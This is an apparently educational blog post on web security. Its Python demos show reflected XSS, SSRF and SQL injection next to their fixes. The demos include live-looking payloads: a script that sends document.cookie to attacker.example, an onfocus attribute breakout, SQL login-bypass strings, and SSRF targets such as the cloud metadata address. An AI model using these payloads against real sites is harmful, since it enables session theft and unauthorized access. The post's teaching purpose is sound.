Web security is an essential part of building modern web applications, and aspiring developers should treat it as a core skill rather than an afterthought. In this blog post I will explain what makes web security so important and why you should learn it as part of your IT skill set.
Why is web security important?
When you really think about it, almost everything runs on the web: company dashboards, account authentication, social media platforms and much more. With so many sensitive interactions happening over the web, it is essential that developers learn enough about security to guard their users' data against unauthorized access.
Well-known web hacking techniques
SQL injection
SQLi is a common vulnerability that arises when user-supplied input is pasted directly into a SQL query, letting an attacker change the query the application sends to its database. Depending on the query, the attacker can read data that belongs to other users or to the site itself, bypass authentication, or modify and delete data, which breaks the proper functioning of the application.
Cross-Site Scripting
XSS is a vulnerability where an attacker gets malicious JavaScript to run in other users' browsers in the context of the vulnerable site, typically by injecting it through user input or a crafted URL that the site echoes back without encoding. Because the script runs with the site's own origin, it can read the page, send requests as the victim and access any cookies that are not marked HttpOnly; session cookies and other sensitive data the browser holds for that site are the usual target.
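To make the "inject through user input" part concrete, here is a reflected XSS in a search page that echoes the query parameter back, beside the same page with proper output encoding. This is an added example written for this post, not code from any project or tool mentioned here; the page markup, the payloads and the injected_script check are constructed for the demonstration. The check parses the rendered HTML the way a browser would and reports whether a <script> tag or an on* event-handler attribute ended up in the document.

```python
from html import escape
from html.parser import HTMLParser


def render_vulnerable(q: str) -> str:
    """Search page that interpolates the raw ?q= parameter into HTML.
    The value lands in two contexts: element text and a double-quoted
    attribute. Either one can be broken out of."""
    return f'<h1>Results for: {q}</h1>\n<input name="q" value="{q}">'


def render_safe(q: str) -> str:
    """Same page with HTML output encoding. html.escape encodes < > &
    and, with quote=True (the default), also " and ', which is what stops
    the attribute-breakout payload."""
    safe_q = escape(q, quote=True)
    return f'<h1>Results for: {safe_q}</h1>\n<input name="q" value="{safe_q}">'


class TagCollector(HTMLParser):
    """Records every tag name and attribute name a browser would see."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.extend(name for name, _ in attrs)


def injected_script(html: str) -> bool:
    """True if the rendered page contains a <script> element or an on*
    event-handler attribute, i.e. something that would execute as JS."""
    collector = TagCollector()
    collector.feed(html)
    return "script" in collector.tags or any(
        name.startswith("on") for name in collector.attrs
    )


if __name__ == "__main__":
    # Constructed attacker payloads, as they would arrive in ?q=...
    text_context = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
    attr_context = '" autofocus onfocus="alert(document.cookie)'
    for payload in (text_context, attr_context):
        print("vulnerable:", injected_script(render_vulnerable(payload)))  # True
        print("safe:      ", injected_script(render_safe(payload)))        # False
```

The encoding has to match the context the data lands in: html.escape is right for element text and quoted attributes, but a value placed inside a <script> block, a URL or an inline event handler needs a different encoder, which is why templating engines that auto-escape per context are the safer default. Note also that the HttpOnly flag stops the first payload from reading document.cookie but does nothing against a script that simply sends requests as the logged-in user.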
Server-Side Request Forgery
In an SSRF attack the attacker supplies a URL or hostname that the backend server fetches on their behalf, so the server makes an HTTP request to a destination the developer never intended. Because that request originates from inside the network, it can reach internal systems that are not normally reachable from the outside, such as admin interfaces or cloud metadata endpoints.
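The usual defence is to validate the destination before the server fetches it. The following is an added example for this post, not code from any project mentioned here: it checks a user-supplied URL's scheme, resolves the hostname, and refuses anything that points at loopback, private, link-local (including the 169.254.169.254 cloud metadata address) or otherwise non-public ranges. The FAKE_DNS table is a constructed stand-in for the real resolver so the example runs offline; pass dns=None to use socket.getaddrinfo instead.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Constructed DNS answers so the example runs offline. A real deployment
# resolves with socket.getaddrinfo (see resolve_host, dns=None).
FAKE_DNS = {
    "example.com": ["93.184.216.34"],
    "internal-admin.corp.example": ["10.0.0.5"],
    "metadata.evil.example": ["169.254.169.254"],
    "localtest.evil.example": ["127.0.0.1"],
}

ALLOWED_SCHEMES = {"http", "https"}


def resolve_host(hostname, dns=FAKE_DNS):
    """Return every IP address the hostname resolves to."""
    if dns is not None:
        return dns.get(hostname, [])
    infos = socket.getaddrinfo(hostname, None)
    return sorted({info[4][0] for info in infos})


def is_public_address(ip_text):
    """Reject loopback, RFC 1918 private, link-local (which covers the
    169.254.169.254 metadata service), multicast, reserved and
    unspecified addresses, for both IPv4 and IPv6."""
    ip = ipaddress.ip_address(ip_text)
    return not (
        ip.is_loopback
        or ip.is_private
        or ip.is_link_local
        or ip.is_multicast
        or ip.is_reserved
        or ip.is_unspecified
    )


def check_outbound_url(url, dns=FAKE_DNS):
    """Validate a user-supplied URL before the server fetches it.
    Returns (ok, reason)."""
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parsed.scheme!r} not allowed"
    if not parsed.hostname:
        return False, "missing host"
    if parsed.username or parsed.password:
        return False, "credentials in URL not allowed"
    try:
        # Literal IP in the URL, e.g. http://127.0.0.1/ or http://[::1]/
        addresses = [str(ipaddress.ip_address(parsed.hostname))]
    except ValueError:
        addresses = resolve_host(parsed.hostname, dns)
    if not addresses:
        return False, f"could not resolve {parsed.hostname!r}"
    # Every answer must be public: an attacker who controls the DNS zone
    # can return a mix of public and private addresses.
    for addr in addresses:
        if not is_public_address(addr):
            return False, f"{parsed.hostname} resolves to non-public {addr}"
    return True, "ok"


if __name__ == "__main__":
    for candidate in (
        "https://example.com/avatar.png",
        "http://127.0.0.1:8080/admin",
        "http://169.254.169.254/latest/meta-data/",
        "http://internal-admin.corp.example/",
        "file:///etc/passwd",
    ):
        print(candidate, "->", check_outbound_url(candidate))
```

Two caveats a practitioner should keep in mind. First, this is a check-then-fetch pattern: if the HTTP client resolves the name again when it connects, an attacker running the DNS zone can answer with a public address for the check and a private one for the fetch (DNS rebinding). The robust fix is to connect to the address you validated, or to send all outbound requests through an egress proxy that only reaches the internet. Second, redirects are a second hop; follow them manually and run the same check on each Location header, or disable them.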
Why security skills make you stand out
Building a complex web application is a high-value skill that opens many doors. Keeping that application secure, so that the chance of a breach stays as low as possible, is a separate skill that far fewer developers have. By learning the most common web vulnerabilities you can guard your applications and their users against attackers. For example, once you understand SQL injection you know to use parameterized queries instead of building SQL strings from user input, so that input can never change the structure of a query, no matter what it contains.
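Here is the SQL injection from the "Well-known web hacking techniques" section and the fix mentioned just above, side by side. This is an added example for this post, not code from any project or course mentioned here; it uses Python's built-in sqlite3 module with a constructed users table (passwords are stored in plain text only to keep the query short; a real application stores password hashes).

```python
import sqlite3

# Constructed sample data for the demonstration, not real credentials.
SAMPLE_USERS = [
    ("alice", "correct horse battery staple", "user"),
    ("admin", "a-long-admin-password", "admin"),
]


def make_db():
    """Build an in-memory SQLite database with the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query with string formatting: the classic SQLi bug.
    The user-controlled text becomes part of the SQL itself."""
    query = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchall()


def login_safe(conn, username, password):
    """Same query with bound parameters. The database receives the SQL and
    the values separately, so a quote or comment marker in the input is
    just data and cannot alter the statement."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    # Attacker input: the quote closes the string literal and "--" turns the
    # rest of the line, including the password check, into a SQL comment.
    print(login_vulnerable(conn, "admin' --", "anything"))   # [('admin', 'admin')]
    print(login_safe(conn, "admin' --", "anything"))         # []
    # A tautology dumps every row instead of one.
    print(login_vulnerable(conn, "' OR 1=1 --", "anything")) # both users
    print(login_safe(conn, "alice", "correct horse battery staple"))  # [('alice', 'user')]
```

Note what the fix is and is not: "sanitizing" by stripping quotes is fragile (encodings, second-order injection, numeric contexts), whereas parameterization removes the problem by never letting input be parsed as SQL. Input validation is still worth doing for its own reasons, but it is not the SQLi defence.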
Where to get started
A great place to start is the PortSwigger Web Security Academy. PortSwigger is the company behind Burp Suite, the standard tool for testing web applications. The academy covers SQL injection, brute-force attacks, XSS, SSRF, CSRF, XXE, authentication and much more, and it takes a lab-oriented approach: every topic comes with deliberately vulnerable targets, so you practise each technique right after reading about it.
There is also the OverTheWire Natas wargame at https://overthewire.org/wargames/natas/, a series of web security challenge levels that you can work through alongside the PortSwigger course.
Resources
Here are some web security resources that I use, including the ones mentioned above:
- https://owasp.org/Top10/2025/ to learn more about the most common web security vulnerabilities.
- https://github.com/uttambodara/TryHackMeRoadmap?tab=readme-ov-file#web for web-security-related TryHackMe rooms.
- portswigger.net for the free Web Security Academy course.
- https://overthewire.org/wargames/natas/ for completing web security challenges.
- https://portswigger.net/bappstore/9abaa233088242e8be252cd4ff534988 a Burp Suite extension for running Intruder-style attacks much faster (a bit of Python knowledge is required).